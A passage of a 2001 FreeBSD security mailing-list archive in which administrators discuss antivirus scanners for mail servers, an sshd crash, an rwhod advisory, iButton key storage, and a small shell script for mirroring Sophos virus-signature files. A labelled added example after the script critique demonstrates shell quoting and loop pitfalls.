> Their licensing looks fair and the sales person assigned to me has been
> politely helpful and not overly insistent. Everything I've looked at so
> far looks great, but the customer that wanted it has had delays and now
> wants to wait for FreeBSD 4.3-RELEASE to install things on their server.
>
> Updates are monthly CDs and urgent updates are available as downloads.
>
> Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
> scan the Samba partitions for file infections. It handles uSoft Office
> products like Word(tm) docs and such.
>
> Best of all, they support FreeBSD so we should support them, right? - Jy@
>

I can't say enough good things about the Sophos product.  We originally
got it in April '99 and have been successfully stopping viruses ever
since.  It is running on our mail server (currently FreeBSD v4.2R, was
3.0Snap until March 1) and is still available in aout and elf versions.
They have also added archive scanning inside numerous archive types. At
the time it was the only major company to have a FreeBSD version (NAI was
reported to have one but I couldn't track it down).  I wrote my own
script, instead of using Amavis, to work with Sendmail to virus scan.
Another thing that I've set up is an automatic ide (virus identity)
download from Sophos.  You can ask for automatic email notification when
they have written a new ide for a new virus (or variant).  When that
email arrives the new ide file is fetched and put into the sweep (their
virus checking program) directory and used next time it is run (I batch
my email scanning).  Service and support questions have always been
answered quickly and professionally.

We also use it on all our Win95/98/Me/NT machines - they update themselves
from a central server that is upgraded manually each month when the CD
arrives.


Scott E. Campbell
_______________________________
Computer Operations
Greater Victoria Public Library
Victoria BC CANADA

(250)382-7241 x230
scampbel@gvpl.ca



> On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:
> > Is anyone aware of any virus scanning solutions for freebsd, particularly
> > solutions for email? I don't trust my users not to follow proper email
> > guidelines, and thus would like to stop email at the server before they get
> > delivered the message.
> >
> > Regards,
> > Mit
> >
> > --
> > Will Mitayai Keeso Rowe
> >
> > For full contact information, please visit:
> > http://my.infotriever.com/mitayai


From owner-freebsd-security  Tue Mar 13 10: 1: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from vbook.express.ru (vbook.express.ru [212.24.37.106])
	by hub.freebsd.org (Postfix) with ESMTP id 1C3FF37B718
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 10:01:01 -0800 (PST)
	(envelope-from vova@vbook.express.ru)
Received: (from vova@localhost)
	by vbook.express.ru (8.9.3/8.9.3) id VAA27600;
	Tue, 13 Mar 2001 21:00:51 +0300 (MSK)
	(envelope-from vova)
From: "Vladimir B. Grebenschikov" <vova@express.ru>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15022.24659.260945.39477@vbook.express.ru>
Date: Tue, 13 Mar 2001 21:00:51 +0300 (MSK)
To: Scott Campbell <scampbel@gvpl.ca>
Cc: James Wyatt <jwyatt@rwsystems.net>,
	Will Mitayai Keeso Rowe <mit@mitayai.net>,
	<freebsd-security@FreeBSD.ORG>
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: <Pine.BSF.4.32.0103130922430.24156-100000@pochta.gvpl.victoria.bc.ca>
References: <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>
	<Pine.BSF.4.32.0103130922430.24156-100000@pochta.gvpl.victoria.bc.ca>
X-Mailer: VM 6.72 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

There is also AVP software at:
ftp://downloads1.kaspersky-labs.com/products/avp_unix/freebsd/
Information about the product is at: http://www.avp.ru/

The product can run in daemon mode (it checks files sent to it via a
Unix domain socket).

--
TSB Russian Express, Moscow
Vladimir B. Grebenschikov, vova@express.ru


From owner-freebsd-security  Tue Mar 13 10:37:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4])
	by hub.freebsd.org (Postfix) with ESMTP id A48B737B718
	for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 10:37:33 -0800 (PST)
	(envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost)
	by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f2DIbe513255
	for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 13:37:40 -0500 (EST)
	(envelope-from rsimmons@wlcg.com)
Date: Tue, 13 Mar 2001 13:37:35 -0500 (EST)
From: Rob Simmons <rsimmons@wlcg.com>
To: <freebsd-security@freebsd.org>
Subject: sshd core
Message-ID: <Pine.BSF.4.33.0103131334500.8515-100000@mail.wlcg.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I was wondering if someone had a patch for the sshd problem when someone
tries to login with a non-existent account?  If so, has it been committed
yet?

Robert Simmons
Systems Administrator
http://www.wlcg.com/

From owner-freebsd-security  Tue Mar 13 10:47:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4])
	by hub.freebsd.org (Postfix) with ESMTP id 828F737B718
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 10:47:20 -0800 (PST)
	(envelope-from mike@sentex.net)
Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47])
	by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f2DIl5656018;
	Tue, 13 Mar 2001 13:47:05 -0500 (EST)
	(envelope-from mike@sentex.net)
Message-Id: <5.0.2.1.0.20010313134057.040dfa70@marble.sentex.ca>
X-Sender: mdtpop@marble.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Version 5.0.2
Date: Tue, 13 Mar 2001 13:41:06 -0500
To: Rob Simmons <rsimmons@wlcg.com>, <freebsd-security@FreeBSD.ORG>
From: Mike Tancsa <mike@sentex.net>
Subject: Re: sshd core
In-Reply-To: <Pine.BSF.4.33.0103131334500.8515-100000@mail.wlcg.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


See the open PR.

         ---Mike



From owner-freebsd-security  Tue Mar 13 13:52:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-59.dsl.lsan03.pacbell.net [63.207.60.59])
	by hub.freebsd.org (Postfix) with ESMTP id 623DC37B718
	for <security@FreeBSD.ORG>; Tue, 13 Mar 2001 13:52:06 -0800 (PST)
	(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
	id 185BA66B6C; Tue, 13 Mar 2001 13:52:06 -0800 (PST)
Date: Tue, 13 Mar 2001 13:52:06 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Garrett Wollman <wollman@khavrinen.lcs.mit.edu>
Cc: security@FreeBSD.ORG
Subject: Re: rwhod
Message-ID: <20010313135205.A17955@mollari.cthul.hu>
References: <200103122347.f2CNlxT28110@freefall.freebsd.org> <200103131644.LAA73764@khavrinen.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="3MwIy2ne0vdjdPXF"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200103131644.LAA73764@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Tue, Mar 13, 2001 at 11:44:24AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--3MwIy2ne0vdjdPXF
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Mar 13, 2001 at 11:44:24AM -0500, Garrett Wollman wrote:
> <<On Mon, 12 Mar 2001 15:47:59 -0800 (PST), FreeBSD Security Advisories <security-advisories@FreeBSD.ORG> said:
> 
> > Remote users can cause the rwhod daemon to crash, denying service to
> > clients.
> 
> It's worth noting that most people who run `rwhod' use it only for
> ``tourist information'' anyway and do not actually depend on the
> information it provides.  I run it on my servers so that the nightly
> reports will include the summary of uptimes and load averages, but if
> one daemon goes AWOL I'll not be particularly concerned.
> 
> If, on the other hand, this bug is actually exploitable, that would be
> much more serious (and would warrant a reissue of the advisory).

Yeah, it's pretty tame..but still worth reporting (instances where
daemons can be remotely induced to crash are a class of bug we report
in advisories, reliability is a component of security, etc :-)

Kris

--3MwIy2ne0vdjdPXF--


From owner-freebsd-security  Tue Mar 13 13:57:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
	by hub.freebsd.org (Postfix) with ESMTP id EE38537B71D
	for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 13:57:33 -0800 (PST)
	(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
	id 10A505BF7; Tue, 13 Mar 2001 13:57:42 -0800 (PST)
Date: Tue, 13 Mar 2001 13:57:41 -0800
From: dannyman <dannyman@toldme.com>
To: James Wyatt <jwyatt@rwsystems.net>
Cc: Will Mitayai Keeso Rowe <mit@mitayai.net>,
	freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
Message-ID: <20010313135741.I3500@dell.dannyland.org>
References: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net> <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>; from jwyatt@rwsystems.net on Mon, Mar 12, 2001 at 09:04:02PM -0600
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Mar 12, 2001 at 09:04:02PM -0600, James Wyatt wrote:
> I have an eval copy of a product that looks promising: Sophos antivirus.
> 
> 	http://www.sophos.com/products/antivirus/savunix.html

I have been using Amavis and Sophos together for a while now.  I must say that
Sophos have been good to us.

[...]
> Updates are monthly CDs and urgent updates are available as downloads.

I have a cron that runs every five minutes to grab the latest identities from
their web site.  We are very secure against even the trendy virii, and it is
kind of fun to respond to a ticket from a well-meaning user warning us of a
new virus that "we have been scanning for this virus since 9:30AM yesterday."
:)

If anyone wants the script, e-mail me.

> Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
> scan the Samba partitions for file infections. It handles uSoft Office
> products like Word(tm) docs and such.

It can open archives and stuff too.  I haven't used Intercheck yet, but that
looks like a very clever idea - your Windows clients contact the unix server
for virus identity updates.

> Best of all, they support FreeBSD so we should support them, right? - Jy@

Amen.  They seem pretty successfully multi-platform.  Were they truly clever
they'd submit a port so you could eval their software. :)

-danny



From owner-freebsd-security  Tue Mar 13 14: 7:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193])
	by hub.freebsd.org (Postfix) with ESMTP id A992F37B719
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 14:07:37 -0800 (PST)
	(envelope-from adam@algroup.co.uk)
Received: from algroup.co.uk ([192.168.192.1]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id QAA09385; Tue, 13 Mar 2001 16:16:15 GMT
Message-ID: <3AAE4798.C7C457E4@algroup.co.uk>
Date: Tue, 13 Mar 2001 16:15:20 +0000
From: Adam Laurie <adam@algroup.co.uk>
X-Mailer: Mozilla 4.7 [en-gb] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: Poul-Henning Kamp <phk@critter.freebsd.dk>
Cc: Terje Elde <terje@thinksec.no>,
	Daniel Hagan <dhagan@colltech.com>, freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
References: <7857.984495569@critter>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Poul-Henning Kamp wrote:
> 
> My share in this is mostly the monitoring gadgets with the 1wire
> products, but given working software I would probably put my pgp
> key somewhere more safe as well.

the iblab test programs provide enough functionality to do this... a
very simple setup is:

create a new pgp private key for your laptop. use it to encrypt your
"real" pgp keyring/ssh keys/whatever and copy the resulting file to the
ibutton. you only EVER use the new keypair for this purpose. when you
need to use your real key, you copy it back off the ibutton, onto
ramdisk, decrypt it, use it, blow away your ramdisk (all nicely wrapped
in a shellscript of course)...

this way, you can take your laptop and your ibutton on the road with
you... if you lose the ibutton it doesn't matter because it's encrypted
with a one-time throw away key that only exists on your laptop, which
you immediately delete. if you lose your laptop, you've lost a key that
was only ever used to encrypt something on your ibutton which you now
overwrite with a new one.

this assumes, of course, that you've stored your "real" original keys
somewhere *really* safe... deep underground, blast doors, bullet proof
glass, etc. etc... you know the kind of thing....  :)

cheers,
Adam
--
Adam Laurie                   Tel: +44 (20) 8742 0755
A.L. Digital Ltd.             Fax: +44 (20) 8742 5995
Voysey House                  http://www.thebunker.net
Barley Mow Passage            http://www.aldigital.co.uk
London W4 4GB                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers



From owner-freebsd-security  Tue Mar 13 14: 7:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193])
	by hub.freebsd.org (Postfix) with ESMTP id 9771137B71A
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 14:07:39 -0800 (PST)
	(envelope-from adam@algroup.co.uk)
Received: from algroup.co.uk ([192.168.192.1]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id OAA09186; Tue, 13 Mar 2001 14:20:05 GMT
Message-ID: <3AAE2C6C.D06A0E88@algroup.co.uk>
Date: Tue, 13 Mar 2001 14:19:24 +0000
From: Adam Laurie <adam@algroup.co.uk>
X-Mailer: Mozilla 4.7 [en-gb] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: Poul-Henning Kamp <phk@critter.freebsd.dk>
Cc: Daniel Hagan <dhagan@colltech.com>, freebsd-security@FreeBSD.ORG,
	iblab@aldigital.co.uk
Subject: Re: iButton Development
References: <6940.984490034@critter>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Poul-Henning Kamp wrote:
> 
> In message <3AADB1D3.C70E00C@colltech.com>, Daniel Hagan writes:
> >There was some discussion regarding iButtons in mid-Jan on this list.
> >I'm interested in getting one or more of these things to play with, with
> >the goal of:
> 
> The best I can suggest you is that we rally all efforts
> around:
>         http://anoncvs.aldigital.co.uk/iBLab/
> 

we would certainly welcome any input and will incorporate any useful code
back into the project.

cheers,
Adam
--
Adam Laurie                   Tel: +44 (20) 8742 0755
A.L. Digital Ltd.             Fax: +44 (20) 8742 5995
Voysey House                  http://www.thebunker.net
Barley Mow Passage            http://www.aldigital.co.uk
London W4 4GB                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers



From owner-freebsd-security  Tue Mar 13 15:15:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
	by hub.freebsd.org (Postfix) with ESMTP id 4628537B719
	for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 15:15:04 -0800 (PST)
	(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
	id A51315BF7; Tue, 13 Mar 2001 15:15:12 -0800 (PST)
Date: Tue, 13 Mar 2001 15:15:12 -0800
From: dannyman <dannyman@toldme.com>
To: freebsd-security@freebsd.org
Subject: Sophos "idefetch" script
Message-ID: <20010313151512.Q3500@dell.dannyland.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Wow, got three responses right away asking for my script to fetch updated IDE
files from Sophos' web site.

Which it turns out is seven lines of sh, and now thirty-some lines of Tellme
Open Source License. :)

http://www.dannyland.org/~dannyman/warez/idefetch

If you can make it better, please share. ;)

-danny



From owner-freebsd-security  Tue Mar 13 15:43:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
	by hub.freebsd.org (Postfix) with ESMTP id E60C537B718
	for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 15:43:41 -0800 (PST)
	(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
	id DBA455BF7; Tue, 13 Mar 2001 15:43:49 -0800 (PST)
Date: Tue, 13 Mar 2001 15:43:49 -0800
From: dannyman <dannyman@toldme.com>
To: freebsd-security@freebsd.org
Subject: Re: Sophos "idefetch" script
Message-ID: <20010313154349.W3500@dell.dannyland.org>
References: <20010313151512.Q3500@dell.dannyland.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <20010313151512.Q3500@dell.dannyland.org>; from dannyman@toldme.com on Tue, Mar 13, 2001 at 03:15:12PM -0800
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Okay ...

So, I added a note about how fetch -m means "mirror" but the other important
thing to note is this is just a simple little brain-dead mirror script, and
the true magic comes from http://www.amavis.org/ so you can scan e-mail. ;)

-danny



From owner-freebsd-security  Tue Mar 13 16: 4: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
	by hub.freebsd.org (Postfix) with ESMTP id 585B037B718
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 16:04:03 -0800 (PST)
	(envelope-from des@ofug.org)
Received: (from des@localhost)
	by flood.ping.uio.no (8.9.3/8.9.3) id BAA51503;
	Wed, 14 Mar 2001 01:03:59 +0100 (CET)
	(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
  coincide with those of any organisation or company with
  which I am or have been affiliated.
To: dannyman <dannyman@toldme.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos "idefetch" script
References: <20010313151512.Q3500@dell.dannyland.org>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 14 Mar 2001 01:03:58 +0100
In-Reply-To: dannyman's message of "Tue, 13 Mar 2001 15:15:12 -0800"
Message-ID: <xzpvgpdz05t.fsf@flood.ping.uio.no>
Lines: 17
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

dannyman <dannyman@toldme.com> writes:
> http://www.dannyland.org/~dannyman/warez/idefetch
> 
> If you can make it better, please share. ;)

Try this on for size:

idesite="http://www.sophos.com/downloads/ide/"
idedir="/usr/local/sav"
fetch="/usr/bin/fetch"
${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do
        ${fetch} -m -q -o ${idedir} "${idesite}${d}"
done

DES
-- 
Dag-Erling Smorgrav - des@ofug.org



From owner-freebsd-security  Tue Mar 13 16:10:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
	by hub.freebsd.org (Postfix) with ESMTP id 59F8B37B718
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 16:10:09 -0800 (PST)
	(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
	id E15865BF7; Tue, 13 Mar 2001 16:10:17 -0800 (PST)
Date: Tue, 13 Mar 2001 16:10:17 -0800
From: dannyman <dannyman@toldme.com>
To: Dag-Erling Smorgrav <des@ofug.org>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos "idefetch" script
Message-ID: <20010313161017.Z3500@dell.dannyland.org>
References: <20010313151512.Q3500@dell.dannyland.org> <xzpvgpdz05t.fsf@flood.ping.uio.no>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <xzpvgpdz05t.fsf@flood.ping.uio.no>; from des@ofug.org on Wed, Mar 14, 2001 at 01:03:58AM +0100
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Mar 14, 2001 at 01:03:58AM +0100, Dag-Erling Smorgrav wrote:
> dannyman <dannyman@toldme.com> writes:
> > http://www.dannyland.org/~dannyman/warez/idefetch
> > 
> > If you can make it better, please share. ;)
> 
> Try this on for size:
> 
> idesite="http://www.sophos.com/downloads/ide/"
> idedir="/usr/local/sav"
> fetch="/usr/bin/fetch"
> ${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do
>         ${fetch} -m -q -o ${idedir} "${idesite}${d}"
> done

DES:

Is this addendum to the script okay by you? ;)

# >>>>>> SNIP HERE IF YOU ARE 31337 <<<<<<
# If you want, use this from Dag-Erling Smorgrav <des@ofug.org>
# (You can use the below without including the Tellme license ;)

#Try this on for size:
#
#idesite="http://www.sophos.com/downloads/ide/"
#idedir="/usr/local/sav"
#fetch="/usr/bin/fetch"
#${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do
#        ${fetch} -m -q -o ${idedir} "${idesite}${d}"
#done



From owner-freebsd-security  Tue Mar 13 16:40:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
	by hub.freebsd.org (Postfix) with ESMTP id 9161E37B71B
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 16:40:20 -0800 (PST)
	(envelope-from des@ofug.org)
Received: (from des@localhost)
	by flood.ping.uio.no (8.9.3/8.9.3) id BAA51694;
	Wed, 14 Mar 2001 01:40:16 +0100 (CET)
	(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
  coincide with those of any organisation or company with
  which I am or have been affiliated.
To: dannyman <dannyman@toldme.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos "idefetch" script
References: <20010313151512.Q3500@dell.dannyland.org> <xzpvgpdz05t.fsf@flood.ping.uio.no> <20010313161017.Z3500@dell.dannyland.org>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 14 Mar 2001 01:40:15 +0100
In-Reply-To: dannyman's message of "Tue, 13 Mar 2001 16:10:17 -0800"
Message-ID: <xzpr901yyhc.fsf@flood.ping.uio.no>
Lines: 25
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

dannyman <dannyman@toldme.com> writes:
> Is this addendum to the script okay by you? ;)

Umm, the idea was actually to suggest an improvement on your own
script. If you don't like it, just ignore it.

 1) it's conventional to use lowercase names for variables internal to
    the script, and reserve uppercase names for variables passed from
    the shell.

 2) you should always take care to wrap variable references in double
    quotes

 3) you shouldn't redirect fetch's stderr to /dev/null, use -q to hide
    the status messages

 4) your for loop will break if one of the IDEs' names contains funny
    characters; my while loop won't

 5) you don't need to cd to ${idedir}, you can ask fetch to put the
    files there for you - though that's mostly a matter of taste

DES
-- 
Dag-Erling Smorgrav - des@ofug.org

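Points 2 and 4 of the critique above are easy to see on a constructed input. The following is an added example, not DES's or dannyman's script and not from the thread: a stand-in IDE list whose third name contains a space, a fake fetch that only records the URL it was asked for, and the two loop shapes side by side. The idesite URL is a placeholder, not the real download site.

```shell
#!/bin/sh
# Added example, not code from the thread. It reproduces points 2 and 4
# of DES's critique: an unquoted "for" loop over command output word-splits
# a name containing whitespace, while "while read" with quoted expansions
# does not. The list contents, the site URL and fake_fetch are constructed.

idesite="http://example.invalid/ide/"   # placeholder, not the real site

# Constructed stand-in for "fetch -q -o - list.txt | cut -c 37-": one IDE
# file name per line. The third name contains a space on purpose.
ide_list() {
    printf '%s\n' 'abc-a.ide' 'def-b.ide' 'bad name.ide' 'last.ide'
}

# Stand-in for "fetch -m -q -o dir url": records the URL it was asked for
# in the file named by $1 instead of touching the network.
fake_fetch() {
    printf '%s\n' "$2" >> "$1"
}

# The fragile shape: $(...) is word-split on IFS (space, tab, newline), so
# 'bad name.ide' arrives as two loop iterations, and the unquoted ${d}
# would split again if it still held whitespace.
for_loop_urls() {
    out=$(mktemp) || return 1
    for d in $(ide_list) ; do
        fake_fetch "$out" ${idesite}${d}
    done
    cat "$out"
    rm -f "$out"
}

# DES's shape: one line per iteration, and every expansion double-quoted.
# IFS= keeps leading/trailing blanks, -r keeps backslashes literal.
while_loop_urls() {
    out=$(mktemp) || return 1
    ide_list | while IFS= read -r d ; do
        fake_fetch "$out" "${idesite}${d}"
    done
    cat "$out"
    rm -f "$out"
}

# Count the requests each shape would make; the list has four names.
count_requests() {
    "$1" | wc -l | tr -d ' '
}

echo "for loop requests  : $(count_requests for_loop_urls)"    # 5
echo "while loop requests: $(count_requests while_loop_urls)"  # 4
```

The for loop asks for two non-existent files ("bad" and "name.ide") and never fetches the real one; with a mirror run from cron that is a silently missing signature file, not an error.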


From owner-freebsd-security  Tue Mar 13 16:54:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
	by hub.freebsd.org (Postfix) with ESMTP id 36C6137B718
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 16:54:26 -0800 (PST)
	(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
	id D262B5BF7; Tue, 13 Mar 2001 16:54:34 -0800 (PST)
Date: Tue, 13 Mar 2001 16:54:34 -0800
From: dannyman <dannyman@toldme.com>
To: Dag-Erling Smorgrav <des@ofug.org>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos "idefetch" script
Message-ID: <20010313165434.B3500@dell.dannyland.org>
References: <20010313151512.Q3500@dell.dannyland.org> <xzpvgpdz05t.fsf@flood.ping.uio.no> <20010313161017.Z3500@dell.dannyland.org> <xzpr901yyhc.fsf@flood.ping.uio.no>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <xzpr901yyhc.fsf@flood.ping.uio.no>; from des@ofug.org on Wed, Mar 14, 2001 at 01:40:15AM +0100
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Mar 14, 2001 at 01:40:15AM +0100, Dag-Erling Smorgrav wrote:
> dannyman <dannyman@toldme.com> writes:
> > Is this addendum to the script okay by you? ;)
> 
> Umm, the idea was actually to suggest an improvement on your own
> script. If you don't like it, just ignore it.
[...]

Ehhh ... great points that I may use in my life.  I just like to share enough
rope to hang oneself.  I try to keep the fetch arguments simple for
portability to non-FreeBSD.  For a simple for loop, things started getting
silly the moment I slapped my company's license on there.  And I used the
uppercase so some random person checking out the script would see "oh ... I
change THAT variable."  (Like a #define or something in a Makefile.)

I put your version at the bottom as the easy, lightweight, not 40 lines of
commentary and license version, as the stuff above, as noted, has gotten
silly, and just to make it absolutely clear, that everything we ever need in
life, can just be finished with the right six lines of shell script.  (Or
one well-formed wget command, but I digress.)

I hope everyone is happily implementing their respective solutions though. :)

Thanks,
-danny

-- 
http://dannyman.toldme.com/



From owner-freebsd-security  Tue Mar 13 18:36: 5 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cs4.cs.ait.ac.th (cs4.cs.ait.ac.th [192.41.170.16])
	by hub.freebsd.org (Postfix) with ESMTP id 269E437B72A
	for <security@FreeBSD.ORG>; Tue, 13 Mar 2001 18:35:55 -0800 (PST)
	(envelope-from Olivier.Nicole@ait.ac.th)
Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2])
	by cs4.cs.ait.ac.th (8.9.3/8.9.3) with ESMTP id JAA25986;
	Wed, 14 Mar 2001 09:35:38 +0700 (GMT+0700)
From: Olivier Nicole <Olivier.Nicole@ait.ac.th>
Received: (from on@localhost)
	by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id JAA25550;
	Wed, 14 Mar 2001 09:35:46 +0700 (ICT)
Date: Wed, 14 Mar 2001 09:35:46 +0700 (ICT)
Message-Id: <200103140235.JAA25550@bazooka.cs.ait.ac.th>
To: lee@kechara.net
Cc: security@FreeBSD.ORG
In-reply-to: <200103131841.SAA10089@mailgate.kechara.net> (message from Lee Smallbone on Tue, 13 Mar 2001 17:35:00 -0000)
Subject: Re: [OT?] - Central point router
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi Lee,

Given that you may have to consider renumbering the servers, and
that you could add a switch behind the FreeBSD router box, it is
pretty simple.

A PII 500, with 128 MB RAM and a 2 GB hard disk (where to find such a
small disk?) can do the trick.

If your LAN is only 10M, then a P100 would be enough (I had been
operating one for years, and upgraded to a PIII when we changed the LAN
to 100M).

You may consider running gated or zebra, though as the routing is
limited, static could do.

It is mainly a problem of setting up the routing (which does not pertain
to this list) and opening a few ports on the firewall.

One alternative solution I read recently is to use a DUMMY interface on
